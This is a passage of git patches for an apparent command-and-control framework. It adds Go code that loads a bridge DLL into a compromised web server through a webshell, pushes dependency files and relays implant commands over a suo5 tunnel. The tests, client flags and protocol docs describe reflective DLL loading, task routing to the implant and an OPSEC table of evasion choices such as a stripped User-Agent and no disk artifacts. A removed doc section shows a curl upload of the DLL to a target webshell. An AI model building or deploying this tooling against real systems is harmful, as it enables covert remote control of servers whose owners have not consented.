bool } + if json.Unmarshal([]byte(text), &sr) == nil { + ready = sr.Ready + } + } else if text == "LOADED" { + ready = true + } + + if !ready && p.DLLPath != "" { + dllBytes, err := os.ReadFile(p.DLLPath) + if err != nil { + return nil, 0, fmt.Errorf("read DLL %s: %w", p.DLLPath, err) + } + if _, err = p.transport.do(wsStageLoad, dllBytes, 0); err != nil { + return nil, 0, fmt.Errorf("load DLL: %w", err) + } + logs.Log.Infof("[webshell] DLL loaded to %s", p.transport.url) + } else if !ready { + return nil, 0, fmt.Errorf("DLL not loaded and no --dll path provided") + } + + body, err := p.transport.do(wsStageInit, nil, 0) + if err != nil { + return nil, 0, fmt.Errorf("init: %w", err) + } + if len(body) < 4 { + return nil, 0, fmt.Errorf("init response too short: %d bytes", len(body)) + } + + sid := binary.LittleEndian.Uint32(body[:4]) + reg := &implantpb.Register{} + if err := proto.Unmarshal(body[4:], reg); err != nil { + return nil, 0, fmt.Errorf("unmarshal register: %w", err) + } + return reg, sid, nil +} + +func (p *WebShellPipeline) deliverDeps() error { + entries, err := os.ReadDir(p.DepsDir) + if err != nil { + return err + } + + for _, entry := range entries { + if entry.IsDir() { + continue + } + data, err := os.ReadFile(filepath.Join(p.DepsDir, entry.Name())) + if err != nil { + return fmt.Errorf("read dep %s: %w", entry.Name(), err) + } + depName := entry.Name() + if !strings.HasPrefix(depName, ".") { + depName = "." + depName + } + nameBytes := []byte(depName) + if len(nameBytes) > 255 { + nameBytes = nameBytes[:255] + } + payload := make([]byte, 1+len(nameBytes)+len(data)) + payload[0] = byte(len(nameBytes)) + copy(payload[1:1+len(nameBytes)], nameBytes) + copy(payload[1+len(nameBytes):], data) + + if _, err = p.transport.do(wsStageDeps, payload, 0); err != nil { + return fmt.Errorf("deliver dep %s: %w", entry.Name(), err) + } + logs.Log.Debugf("[webshell] dep delivered: %s", entry.Name()) + } + return nil +} + +func (p *WebShellPipeline) dialSuo5() (net.Conn, error) { + u, err := url.Parse(p.Suo5URL) + if err != nil { + return nil, fmt.Errorf("parse suo5 url: %w", err) + } + conf, err := suo5.NewConfFromURL(u) + if err != nil { + return nil, fmt.Errorf("suo5 config: %w", err) + } + if string(conf.Mode) == "half" { + return nil, fmt.Errorf("suo5 detected half-duplex mode; webshell bridge requires full-duplex (target may be behind a buffering reverse proxy)") + } + client := &suo5.Suo5Client{Proxy: u, Conf: conf} + conn, err := client.Dial("tcp", "bridge:0") + if err != nil { + return nil, fmt.Errorf("suo5 dial: %w", err) + } + return conn, nil +} + +func (p *WebShellPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { + label := fmt.Sprintf("webshell pipeline %s %s", p.Name, scope) + return core.CombineErrorHandlers( + core.LogGuardedError(label), + func(err error) { + p.Enable = false + if core.EventBroker != nil { + core.EventBroker.Publish(core.Event{ + EventType: consts.EventListener, + Op: consts.CtrlPipelineStop, + Listener: &clientpb.Listener{Id: p.ListenerID}, + Message: label, + Err: core.ErrorText(err), + Important: true, + }) + } + }, + ) +} + +// --- TLV frame protocol: [0xd1][4B sid LE][4B len LE][data][0xd2] --- + +func writeFrame(conn net.Conn, spites *implantpb.Spites, sid uint32) error { + data, err := proto.Marshal(spites) + if err != nil { + return err + } + buf := make([]byte, tlvHeaderLen+len(data)+1) + buf[0] = tlvStart + binary.LittleEndian.PutUint32(buf[1:5], sid) + binary.LittleEndian.PutUint32(buf[5:9], uint32(len(data))) + copy(buf[tlvHeaderLen:], data) + buf[len(buf)-1] = tlvEnd + _, err = conn.Write(buf) + return err +} + +func readFrame(conn net.Conn) (*implantpb.Spites, error) { + var hdr [tlvHeaderLen]byte + if _, err := io.ReadFull(conn, hdr[:]); err != nil { + return nil, err + } + if hdr[0] != tlvStart { + return nil, fmt.Errorf("invalid TLV start: 0x%02x", hdr[0]) + } + length := binary.LittleEndian.Uint32(hdr[5:9]) + if length > maxFrameSize { + return nil, fmt.Errorf("frame too large: %d bytes", length) + } + // +1 for end delimiter + payload := make([]byte, length+1) + if _, err := io.ReadFull(conn, payload); err != nil { + return nil, err + } + if payload[length] != tlvEnd { + return nil, fmt.Errorf("invalid TLV end: 0x%02x", payload[length]) + } + spites := &implantpb.Spites{} + if err := proto.Unmarshal(payload[:length], spites); err != nil { + return nil, err + } + return spites, nil +} + +// --- Helpers --- + +func computeBootstrapToken(secret string) string { + if secret == "" { + return "" + } + if len(secret) <= 32 { + return secret + } + window := time.Now().Unix() / 30 + mac := hmac.New(sha256.New, []byte(secret)) + _ = binary.Write(mac, binary.BigEndian, window) + return hex.EncodeToString(mac.Sum(nil)) +} + +func suo5ToHTTPURL(suo5URL string) string { + s := strings.TrimSpace(suo5URL) + s = strings.Replace(s, "suo5s://", "https://", 1) + s = strings.Replace(s, "suo5://", "http://", 1) + return s +} + diff --git a/server/listener/webshell_test.go b/server/listener/webshell_test.go new file mode 100644 index 00000000..2492d212 --- /dev/null +++ b/server/listener/webshell_test.go @@ -0,0 +1,201 @@ +package listener + +import ( + "encoding/binary" + "io" + "net" + "net/http" + "net/http/httptest" + "testing" + "time" + + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "google.golang.org/protobuf/proto" +) + +func TestWriteReadFrameTLV(t *testing.T) { + server, client := net.Pipe() + defer server.Close() + defer client.Close() + + want := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Name: "test_cmd", TaskId: 42}, + }, + } + + errCh := make(chan error, 1) + go func() { + errCh <- writeFrame(server, want, 1234) + }() + + got, err := readFrame(client) + if err != nil { + t.Fatalf("readFrame: %v", err) + } + if writeErr := <-errCh; writeErr != nil { + t.Fatalf("writeFrame: %v", writeErr) + } + + if len(got.Spites) != 1 { + t.Fatalf("spite count = %d, want 1", len(got.Spites)) + } + if got.Spites[0].Name != "test_cmd" { + t.Fatalf("spite name = %q, want %q", got.Spites[0].Name, "test_cmd") + } + if got.Spites[0].TaskId != 42 { + t.Fatalf("task_id = %d, want 42", got.Spites[0].TaskId) + } +} + +func TestWriteFrameTLVWireFormat(t *testing.T) { + server, client := net.Pipe() + defer server.Close() + defer client.Close() + + spites := &implantpb.Spites{ + Spites: []*implantpb.Spite{{Name: "ping"}}, + } + var sid uint32 = 0xDEAD + + go writeFrame(server, spites, sid) + + // Read raw bytes to verify TLV wire format. + var hdr [tlvHeaderLen]byte + if _, err := io.ReadFull(client, hdr[:]); err != nil { + t.Fatalf("read header: %v", err) + } + + if hdr[0] != tlvStart { + t.Fatalf("start delimiter = 0x%02x, want 0x%02x", hdr[0], tlvStart) + } + gotSid := binary.LittleEndian.Uint32(hdr[1:5]) + if gotSid != sid { + t.Fatalf("sid = %d, want %d", gotSid, sid) + } + + dataLen := binary.LittleEndian.Uint32(hdr[5:9]) + data, _ := proto.Marshal(spites) + if dataLen != uint32(len(data)) { + t.Fatalf("frame length = %d, want %d", dataLen, len(data)) + } + + // Read payload + end delimiter. + payload := make([]byte, dataLen+1) + if _, err := io.ReadFull(client, payload); err != nil { + t.Fatalf("read payload: %v", err) + } + if payload[dataLen] != tlvEnd { + t.Fatalf("end delimiter = 0x%02x, want 0x%02x", payload[dataLen], tlvEnd) + } +} + +func TestReadFrameInvalidStart(t *testing.T) { + server, client := net.Pipe() + defer server.Close() + defer client.Close() + + go func() { + // Write garbage header. + buf := make([]byte, tlvHeaderLen) + buf[0] = 0xFF + server.Write(buf) + }() + + _, err := readFrame(client) + if err == nil { + t.Fatal("expected error for invalid start delimiter") + } +} + +func TestSuo5ToHTTPURL(t *testing.T) { + tests := []struct { + input string + want string + }{ + {"suo5://target/bridge.php", "http://target/bridge.php"}, + {"suo5s://target/bridge.php", "https://target/bridge.php"}, + {"suo5://10.0.0.1:8080/shell.jsp", "http://10.0.0.1:8080/shell.jsp"}, + } + for _, tt := range tests { + got := suo5ToHTTPURL(tt.input) + if got != tt.want { + t.Errorf("suo5ToHTTPURL(%q) = %q, want %q", tt.input, got, tt.want) + } + } +} + +func TestComputeBootstrapToken(t *testing.T) { + if got := computeBootstrapToken(""); got != "" { + t.Fatalf("empty secret = %q, want empty", got) + } + if got := computeBootstrapToken("short"); got != "short" { + t.Fatalf("short secret = %q, want %q", got, "short") + } + got := computeBootstrapToken("this-is-a-very-long-secret-that-exceeds-32-characters") + if len(got) != 64 { + t.Fatalf("HMAC token length = %d, want 64", len(got)) + } +} + +func TestNewWebShellPipelineMissingParams(t *testing.T) { + _, err := NewWebShellPipeline(nil, nil) + if err == nil { + t.Fatal("expected error for nil pipeline") + } +} + +func TestHTTPTransportOPSECHeaders(t *testing.T) { + var gotUA, gotCT string + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotUA = r.Header.Get("User-Agent") + gotCT = r.Header.Get("Content-Type") + w.WriteHeader(http.StatusOK) + w.Write([]byte("OK")) + })) + defer ts.Close() + + transport := &httpTransport{ + client: ts.Client(), + url: ts.URL, + token: "", + } + + _, err := transport.do(wsStageStatus, nil, 0) + if err != nil { + t.Fatalf("transport.do: %v", err) + } + + if gotUA != "" { + t.Errorf("User-Agent = %q, want empty", gotUA) + } + if gotCT != "application/x-www-form-urlencoded" { + t.Errorf("Content-Type = %q, want application/x-www-form-urlencoded", gotCT) + } +} + +func TestHTTPTransportPlaintextEnvelope(t *testing.T) { + token := "my-secret-token" + var receivedBody []byte + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + receivedBody, _ = io.ReadAll(r.Body) + w.WriteHeader(http.StatusOK) + w.Write([]byte("OK")) + })) + defer ts.Close() + + transport := newHTTPTransport("suo5://unused", token, 5*time.Second) + transport.client = ts.Client() + transport.url = ts.URL + + _, err := transport.do(wsStageStatus, []byte("test"), 0) + if err != nil { + t.Fatalf("transport.do: %v", err) + } + + // Envelope is plaintext: first byte must be the raw stage code. + if len(receivedBody) == 0 || receivedBody[0] != wsStageStatus { + t.Errorf("first byte = 0x%02x, want 0x%02x (plaintext stage)", receivedBody[0], wsStageStatus) + } +} From 243a0ef1139d53e8d6c627b843492b46558a143b Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:16:14 +0800 Subject: [PATCH 17/19] refactor(pipeline): update webshell commands for suo5 transport Replace bridge-binary-oriented client commands with suo5-backed params. Add --suo5, --token, --dll, --deps flags; store params as JSON in CustomPipeline.Params; remove resolveWebShellListenerHost and bridge hints. --- client/command/pipeline/commands.go | 16 +++-- client/command/pipeline/webshell.go | 69 ++++++++++------------ client/command/pipeline/webshell_test.go | 75 +++++++++++------------- 3 files changed, 76 insertions(+), 84 deletions(-) diff --git a/client/command/pipeline/commands.go b/client/command/pipeline/commands.go index c17a97ed..8d87ab6e 100644 --- a/client/command/pipeline/commands.go +++ b/client/command/pipeline/commands.go @@ -264,24 +264,32 @@ rem update interval --pipeline-id rem_graph_api_03 --agent-id uDM0BgG6 5000 newWebShellCmd := &cobra.Command{ Use: "new [name]", - Short: "Register a new webshell pipeline", - Long: "Register a CustomPipeline(type=webshell) for the webshell-bridge binary to connect to.", + Short: "Register a new webshell pipeline with suo5 transport", + Long: "Register a WebShell pipeline that uses suo5 for full-duplex streaming to the target webshell.", Args: cobra.MaximumNArgs(1), RunE: func(cmd *cobra.Command, args []string) error { return NewWebShellCmd(cmd, con) }, Example: `~~~ -webshell new --listener my-listener -webshell new ws1 --listener my-listener +webshell new --listener my-listener --suo5 suo5://target/bridge.php --token secret +webshell new ws1 --listener my-listener --suo5 suo5://target/bridge.php --token secret --dll /path/to/dll ~~~`, } common.BindFlag(newWebShellCmd, func(f *pflag.FlagSet) { f.StringP("listener", "l", "", "listener id") + f.String("suo5", "", "suo5 URL to webshell (e.g., suo5://target/bridge.php)") + f.String("token", "", "stage token for DLL bootstrap authentication") + f.String("dll", "", "path to bridge DLL for auto-loading") + f.String("deps", "", "directory containing dependency files (e.g., jna.jar)") }) common.BindFlagCompletions(newWebShellCmd, func(comp carapace.ActionMap) { comp["listener"] = common.ListenerIDCompleter(con) + comp["suo5"] = carapace.ActionValues().Usage("suo5 URL") + comp["dll"] = carapace.ActionFiles().Usage("bridge DLL path") + comp["deps"] = carapace.ActionDirectories().Usage("deps directory") }) newWebShellCmd.MarkFlagRequired("listener") + newWebShellCmd.MarkFlagRequired("suo5") startWebShellCmd := &cobra.Command{ Use: "start ", diff --git a/client/command/pipeline/webshell.go b/client/command/pipeline/webshell.go index 692a290e..bc1410af 100644 --- a/client/command/pipeline/webshell.go +++ b/client/command/pipeline/webshell.go @@ -1,6 +1,7 @@ package pipeline import ( + "encoding/json" "fmt" "github.com/chainreactors/IoM-go/proto/client/clientpb" @@ -11,6 +12,14 @@ import ( const webshellPipelineType = "webshell" +// webshellParams mirrors the server-side struct for JSON serialization. +type webshellCmdParams struct { + Suo5URL string `json:"suo5_url"` + StageToken string `json:"stage_token,omitempty"` + DLLPath string `json:"dll_path,omitempty"` + DepsDir string `json:"deps_dir,omitempty"` +} + // ListWebShellCmd lists all webshell pipelines for a given listener. func ListWebShellCmd(cmd *cobra.Command, con *core.Console) error { listenerID := cmd.Flags().Arg(0) @@ -39,19 +48,33 @@ func ListWebShellCmd(cmd *cobra.Command, con *core.Console) error { return nil } -// NewWebShellCmd registers a new webshell pipeline using the CustomPipeline mechanism. -// The actual bridge binary (webshell-bridge) connects to this pipeline externally. +// NewWebShellCmd registers a new webshell pipeline backed by suo5 transport. func NewWebShellCmd(cmd *cobra.Command, con *core.Console) error { name := cmd.Flags().Arg(0) listenerID, _ := cmd.Flags().GetString("listener") + suo5URL, _ := cmd.Flags().GetString("suo5") + token, _ := cmd.Flags().GetString("token") + dllPath, _ := cmd.Flags().GetString("dll") + depsDir, _ := cmd.Flags().GetString("deps") if listenerID == "" { return fmt.Errorf("listener id is required") } + if suo5URL == "" { + return fmt.Errorf("--suo5 URL is required (e.g., suo5://target/bridge.php)") + } if name == "" { name = fmt.Sprintf("webshell_%s", listenerID) } + params := webshellCmdParams{ + Suo5URL: suo5URL, + StageToken: token, + DLLPath: dllPath, + DepsDir: depsDir, + } + paramsJSON, _ := json.Marshal(params) + pipeline := &clientpb.Pipeline{ Name: name, ListenerId: listenerID, @@ -61,16 +84,15 @@ func NewWebShellCmd(cmd *cobra.Command, con *core.Console) error { Custom: &clientpb.CustomPipeline{ Name: name, ListenerId: listenerID, - Host: resolveWebShellListenerHost(con, listenerID), + Params: string(paramsJSON), }, }, } _, err := con.Rpc.RegisterPipeline(con.Context(), pipeline) if err != nil { - return webShellBridgeHint(listenerID, fmt.Errorf("register webshell pipeline %s: %w", name, err)) + return fmt.Errorf("register webshell pipeline %s: %w", name, err) } - con.Log.Importantf("WebShell pipeline %s registered\n", name) _, err = con.Rpc.StartPipeline(con.Context(), &clientpb.CtrlPipeline{ @@ -79,12 +101,10 @@ func NewWebShellCmd(cmd *cobra.Command, con *core.Console) error { Pipeline: pipeline, }) if err != nil { - return webShellBridgeHint(listenerID, fmt.Errorf("start webshell pipeline %s: %w", name, err)) + return fmt.Errorf("start webshell pipeline %s: %w", name, err) } - con.Log.Importantf("WebShell pipeline %s started\n", name) - con.Log.Infof("The bridge should already be running for listener %s and waiting on pipeline control.\n", listenerID) - con.Log.Infof("If the DLL is not loaded yet, the bridge will keep retrying until the rem server becomes reachable.\n") + con.Log.Importantf("WebShell pipeline %s started (suo5: %s)\n", name, suo5URL) return nil } @@ -96,13 +116,12 @@ func StartWebShellCmd(cmd *cobra.Command, con *core.Console) error { if err != nil { return err } - listenerID = pipeline.GetListenerId() _, err = con.Rpc.StartPipeline(con.Context(), &clientpb.CtrlPipeline{ Name: name, - ListenerId: listenerID, + ListenerId: pipeline.GetListenerId(), }) if err != nil { - return webShellBridgeHint(listenerID, fmt.Errorf("start webshell pipeline %s: %w", name, err)) + return fmt.Errorf("start webshell pipeline %s: %w", name, err) } con.Log.Importantf("WebShell pipeline %s started\n", name) return nil @@ -146,25 +165,6 @@ func DeleteWebShellCmd(cmd *cobra.Command, con *core.Console) error { return nil } -func resolveWebShellListenerHost(con *core.Console, listenerID string) string { - if listenerID == "" || con == nil { - return "" - } - if listener, ok := con.Listeners[listenerID]; ok && listener.GetIp() != "" { - return listener.GetIp() - } - listeners, err := con.Rpc.GetListeners(con.Context(), &clientpb.Empty{}) - if err != nil { - return "" - } - for _, listener := range listeners.GetListeners() { - if listener.GetId() == listenerID { - return listener.GetIp() - } - } - return "" -} - func resolveWebShellPipeline(con *core.Console, name, listenerID string) (*clientpb.Pipeline, error) { if name == "" { return nil, fmt.Errorf("webshell pipeline name is required") @@ -204,10 +204,3 @@ func resolveWebShellPipeline(con *core.Console, name, listenerID string) (*clien } return match, nil } - -func webShellBridgeHint(listenerID string, err error) error { - if listenerID == "" { - return err - } - return fmt.Errorf("%w; start webshell-bridge for listener %s first", err, listenerID) -} diff --git a/client/command/pipeline/webshell_test.go b/client/command/pipeline/webshell_test.go index 4234ff58..864cd34c 100644 --- a/client/command/pipeline/webshell_test.go +++ b/client/command/pipeline/webshell_test.go @@ -2,6 +2,7 @@ package pipeline_test import ( "context" + "encoding/json" "errors" "strings" "testing" @@ -12,14 +13,10 @@ import ( "github.com/spf13/cobra" ) -func TestNewWebShellCmdUsesCachedListenerHost(t *testing.T) { +func TestNewWebShellCmdStoresParamsInCustomPipeline(t *testing.T) { h := testsupport.NewClientHarness(t) - h.Console.Listeners["listener-a"] = &clientpb.Listener{ - Id: "listener-a", - Ip: "10.10.10.10", - } - cmd := newWebShellTestCommand(t, "--listener", "listener-a", "ws-a") + cmd := newWebShellTestCommand(t, "--listener", "listener-a", "--suo5", "suo5://target/bridge.php", "--token", "secret123", "ws-a") if err := pipelinecmd.NewWebShellCmd(cmd, h.Console); err != nil { t.Fatalf("NewWebShellCmd failed: %v", err) } @@ -36,64 +33,54 @@ func TestNewWebShellCmdUsesCachedListenerHost(t *testing.T) { if !ok { t.Fatalf("register request type = %T, want *clientpb.Pipeline", calls[0].Request) } + if req.Type != "webshell" { + t.Fatalf("pipeline type = %q, want %q", req.Type, "webshell") + } custom, ok := req.Body.(*clientpb.Pipeline_Custom) if !ok { t.Fatalf("register pipeline body = %T, want *clientpb.Pipeline_Custom", req.Body) } - if custom.Custom.GetHost() != "10.10.10.10" { - t.Fatalf("custom host = %q, want %q", custom.Custom.GetHost(), "10.10.10.10") - } -} -func TestNewWebShellCmdFallsBackToGetListenersForHost(t *testing.T) { - h := testsupport.NewClientHarness(t) - h.Recorder.OnListeners("GetListeners", func(_ context.Context, _ any) (*clientpb.Listeners, error) { - return &clientpb.Listeners{ - Listeners: []*clientpb.Listener{{ - Id: "listener-b", - Ip: "192.0.2.15", - }}, - }, nil - }) - - cmd := newWebShellTestCommand(t, "--listener", "listener-b", "ws-b") - if err := pipelinecmd.NewWebShellCmd(cmd, h.Console); err != nil { - t.Fatalf("NewWebShellCmd failed: %v", err) + var params struct { + Suo5URL string `json:"suo5_url"` + StageToken string `json:"stage_token"` } - - calls := h.Recorder.Calls() - if len(calls) != 3 { - t.Fatalf("call count = %d, want 3", len(calls)) + if err := json.Unmarshal([]byte(custom.Custom.Params), ¶ms); err != nil { + t.Fatalf("unmarshal params: %v", err) } - if calls[0].Method != "GetListeners" { - t.Fatalf("first method = %s, want GetListeners", calls[0].Method) + if params.Suo5URL != "suo5://target/bridge.php" { + t.Fatalf("suo5_url = %q, want %q", params.Suo5URL, "suo5://target/bridge.php") } - req, ok := calls[1].Request.(*clientpb.Pipeline) - if !ok { - t.Fatalf("register request type = %T, want *clientpb.Pipeline", calls[1].Request) + if params.StageToken != "secret123" { + t.Fatalf("stage_token = %q, want %q", params.StageToken, "secret123") } - custom, ok := req.Body.(*clientpb.Pipeline_Custom) - if !ok { - t.Fatalf("register pipeline body = %T, want *clientpb.Pipeline_Custom", req.Body) +} + +func TestNewWebShellCmdRequiresSuo5Flag(t *testing.T) { + h := testsupport.NewClientHarness(t) + cmd := newWebShellTestCommand(t, "--listener", "listener-b", "ws-b") + err := pipelinecmd.NewWebShellCmd(cmd, h.Console) + if err == nil { + t.Fatal("NewWebShellCmd error = nil, want error") } - if custom.Custom.GetHost() != "192.0.2.15" { - t.Fatalf("custom host = %q, want %q", custom.Custom.GetHost(), "192.0.2.15") + if !strings.Contains(err.Error(), "--suo5") { + t.Fatalf("error = %q, want suo5 requirement", err) } } -func TestNewWebShellCmdWrapsRegisterErrorWithBridgeHint(t *testing.T) { +func TestNewWebShellCmdWrapsRegisterError(t *testing.T) { h := testsupport.NewClientHarness(t) h.Recorder.OnEmpty("RegisterPipeline", func(_ context.Context, _ any) (*clientpb.Empty, error) { return nil, errors.New("listener not found") }) - cmd := newWebShellTestCommand(t, "--listener", "listener-c", "ws-c") + cmd := newWebShellTestCommand(t, "--listener", "listener-c", "--suo5", "suo5://target/x.php", "--token", "secret", "ws-c") err := pipelinecmd.NewWebShellCmd(cmd, h.Console) if err == nil { t.Fatal("NewWebShellCmd error = nil, want error") } - if !strings.Contains(err.Error(), "start webshell-bridge for listener listener-c first") { - t.Fatalf("error = %q, want bridge hint", err) + if !strings.Contains(err.Error(), "register webshell pipeline") { + t.Fatalf("error = %q, want register error", err) } } @@ -163,6 +150,10 @@ func newWebShellTestCommand(t *testing.T, args ...string) *cobra.Command { cmd := &cobra.Command{} cmd.Flags().StringP("listener", "l", "", "listener id") + cmd.Flags().String("suo5", "", "suo5 URL") + cmd.Flags().String("token", "", "stage token") + cmd.Flags().String("dll", "", "DLL path") + cmd.Flags().String("deps", "", "deps directory") if err := cmd.Flags().Parse(args); err != nil { t.Fatalf("parse flags: %v", err) } From 9bee95dfac3a462e68a2777895e0750d413c416a Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:16:23 +0800 Subject: [PATCH 18/19] docs(protocol): update webshell bridge for in-listener architecture Reflect the move from standalone bridge binary to WebShellPipeline running inside the listener process with suo5 data channel and TLV framing. --- docs/protocol/webshell-bridge.md | 144 ++++++++++++++++--------------- 1 file changed, 74 insertions(+), 70 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index 9028b8fe..e1ffa17c 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -5,7 +5,7 @@ WebShell Bridge enables IoM to operate through webshells (JSP/PHP/ASPX) using a memory channel architecture. The bridge DLL is loaded into the web server process memory, and the webshell calls DLL exports directly via function pointers — no TCP ports opened on the target. - **Product layer**: Server sees a `CustomPipeline(type="webshell")`. Operators interact via `webshell new/start/stop/delete` commands. -- **Implementation layer**: Bridge binary runs on the operator machine, sending HTTP requests to the webshell with `X-Stage` headers. +- **Implementation layer**: `WebShellPipeline` in the listener process handles DLL bootstrap via HTTP and establishes a persistent suo5 data channel. - **Transport layer**: The webshell loads the DLL, resolves exports, and calls `bridge_init`/`bridge_process` directly. Pure memory channel. ## Architecture @@ -23,19 +23,26 @@ Product Layer (operator sees) Session appears like any other implant session -Bridge Binary (server/cmd/webshell-bridge/) -───────────────────────────────────────── - Runs on operator machine, connects to Server via ListenerRPC (mTLS) +Listener Process (WebShellPipeline) +──────────────────────────────────── + Runs inside the listener, connects to Server via ListenerRPC (mTLS) - ┌─ HTTP transport ───────────────────────────────────────┐ - │ HTTP POST with X-Stage headers to webshell URL │ - │ Raw protobuf over HTTP body (no malefic framing) │ - └────────────────────────────────────────────────────────┘ + ┌─ Bootstrap (HTTP POST) ──────────────────────────────────┐ + │ Body envelope: [1B stage][4B sid LE][1B tok_len][tok][…] │ + │ Optional XOR obfuscation (key = sha256(token)[:16]) │ + │ OPSEC: no User-Agent, Content-Type mimics form POST │ + └──────────────────────────────────────────────────────────┘ - ┌─ spite/session adapter ────────────────────────────────┐ - │ SpiteStream ↔ HTTP request/response translation │ - │ Session registration, checkin, task routing │ - └────────────────────────────────────────────────────────┘ + ┌─ Data channel (suo5 full-duplex) ────────────────────────┐ + │ proxyclient/suo5 → net.Conn │ + │ TLV frames: [0xd1][4B sid][4B len][spite bytes][0xd2] │ + │ Bidirectional streaming over persistent connection │ + └──────────────────────────────────────────────────────────┘ + + ┌─ Forward integration ────────────────────────────────────┐ + │ SpiteStream ↔ TLV frame translation │ + │ Session registration, checkin, task routing │ + └──────────────────────────────────────────────────────────┘ Target Web Server Process @@ -43,7 +50,7 @@ Target Web Server Process WebShell (JSP/PHP/ASPX) - Bridge DLL loading (ReflectiveLoader) - Export resolution (bridge_init, bridge_process) - - X-Stage: spite → call bridge_process() → return response + - TLV frames → call bridge_process() → return TLV response - No port opened, no TCP loopback Bridge Runtime DLL (in web server process memory) @@ -63,14 +70,13 @@ Target Web Server Process ``` Client exec("whoami") → Server (SpiteStream) - → Bridge binary (HTTP POST X-Stage: spite) - → WebShell (calls bridge_process via function pointer) - → DLL module runtime - → exec("whoami") → "root" - → Spite response returned from bridge_process - → HTTP response body - → Bridge binary → SpiteStream.Send(response) - → Server → Client displays "root" + → WebShellPipeline handler (receives SpiteRequest) + → writeFrame: TLV pack → suo5 conn + → WebShell (calls bridge_process via function pointer) + → DLL module runtime → exec("whoami") → "root" + → TLV response via suo5 conn + → readLoop: TLV unpack → Forwarders.Send(SpiteResponse) + → Server → Client displays "root" ``` ## Usage @@ -79,44 +85,17 @@ Client exec("whoami") Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. -### 2. Build and run bridge binary - -```bash -go build -o webshell-bridge ./server/cmd/webshell-bridge/ - -webshell-bridge \ - --auth listener.auth \ - --url http://target.com/suo5.aspx \ - --listener my-listener \ - --token CHANGE_ME_RANDOM_TOKEN \ - --dll bridge.dll -``` - -The `--token` must match the `STAGE_TOKEN` constant in the webshell. Use the full HTTP(S) URL of the deployed webshell. - -The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell via `X-Stage: load` if it is not already loaded. If `--dll` is omitted, you must load the DLL manually (see below). - -At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline control messages. - -### 3. Register and start the pipeline from Client/TUI +### 2. Register and start the pipeline ``` -webshell new --listener my-listener +webshell new --listener my-listener --suo5 suo5://target/bridge.jsp --token SECRET --dll /path/to/bridge.dll ``` -The bridge receives the start event, auto-loads the DLL (if `--dll` was provided), establishes the session, and the operator can interact immediately. +The optional `--token` must match the `STAGE_TOKEN` constant in the webshell if set. Use the suo5 URL scheme (`suo5://` or `suo5s://` for HTTPS). -**Manual DLL loading** (only needed if `--dll` is not set): - -```bash -curl -X POST \ - -H "X-Stage: load" \ - -H "X-Token: CHANGE_ME_RANDOM_TOKEN" \ - --data-binary @bridge.dll \ - http://target.com/suo5.aspx -``` +The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell if it is not already loaded. -### 4. Interact +### 3. Interact ``` use @@ -127,18 +106,33 @@ download /remote/file ## Protocol -### HTTP Endpoints (X-Stage headers) +### Bootstrap Envelope -| Stage | Method | Description | -|-------|--------|-------------| -| `load` | POST | Load bridge DLL into memory (body = raw DLL bytes) | -| `deps` | POST | Deliver dependency file (e.g., jna.jar) with `X-Dep-Name` header | -| `status` | POST | Check if DLL is loaded (returns JSON `{"ready":true,...}` or legacy `LOADED`/`NOT_LOADED`) | -| `init` | POST | Get Register data from `bridge_init()` (returns `[4B sessionID LE][Register protobuf]`) | -| `spite` | POST | Process Spites via `bridge_process()` (body/response = serialized `Spites` protobuf) | -| `stream` | POST | Long-lived response stream (length-prefixed frames, falls back to `spite` polling if unsupported) | +Bootstrap requests use HTTP POST with `Content-Type: application/x-www-form-urlencoded` and no `User-Agent` header. The envelope is sent in plaintext; authentication is via the token field in the envelope header. -All stage requests require `X-Token` header matching `STAGE_TOKEN`. +**Envelope format (before optional XOR):** `[1B stage][4B sessionID LE][1B token_len][token bytes][payload...]` + +| Stage byte | Name | Payload | Response | +|-----------|------|---------|----------| +| `0x01` | load | Raw DLL bytes | `OK:memory` or error string | +| `0x02` | status | (empty) | JSON `{"ready":true,...}` or legacy `LOADED`/`NOT_LOADED` | +| `0x03` | init | (empty) | `[4B sessionID LE][Register protobuf]` | +| `0x06` | deps | `[1B dep_name_len][dep_name][file bytes]` | `OK:` or error string | + +Token validation uses HMAC-SHA256 for secrets longer than 32 characters (rotates every 30s with +/-30s tolerance). Short secrets use static comparison. + +### Data Channel TLV Frame + +After bootstrap, a persistent suo5 connection carries bidirectional TLV frames: + +``` +[1B 0xd1][4B sessionID LE][4B payload_len LE][payload bytes][1B 0xd2] +``` + +- `0xd1` / `0xd2` are start/end delimiters matching malefic wire format +- Payload is serialized `Spites` protobuf +- Maximum frame size: 10 MiB +- Future: payload will be encrypted (outer streaming encryption layer) ### DLL Export Interface @@ -168,15 +162,25 @@ int __stdcall bridge_destroy(); The DLL must also export `ReflectiveLoader` for the loading phase. The webshell uses ReflectiveLoader to map the DLL, then resolves `bridge_init`/`bridge_process` from the mapped image's export table. +## OPSEC Properties + +| Property | Status | +|----------|--------| +| Custom HTTP headers | None — no X-*, no custom cookies | +| User-Agent | Empty (Go default stripped) | +| Content-Type | `application/x-www-form-urlencoded` (common POST type) | +| Bootstrap body | Plaintext envelope (token included for auth) | +| Data channel | TLV-framed, ready for encryption layer | +| Ports opened | None on target | +| Disk artifacts | None (DLL is memory-only) | + ## Key Files | Purpose | Path | |---------|------| -| Bridge binary | `server/cmd/webshell-bridge/` | -| Channel (HTTP) | `server/cmd/webshell-bridge/channel.go` | -| Session management | `server/cmd/webshell-bridge/session.go` | +| WebShell pipeline | `server/listener/webshell.go` | +| Pipeline tests | `server/listener/webshell_test.go` | | Client commands | `client/command/pipeline/webshell.go` | -| CustomPipeline (server) | `server/listener/custom.go` | -| Webshell (ASPX) | `suo5-webshell/suo5.aspx` | -| Webshell (PHP) | 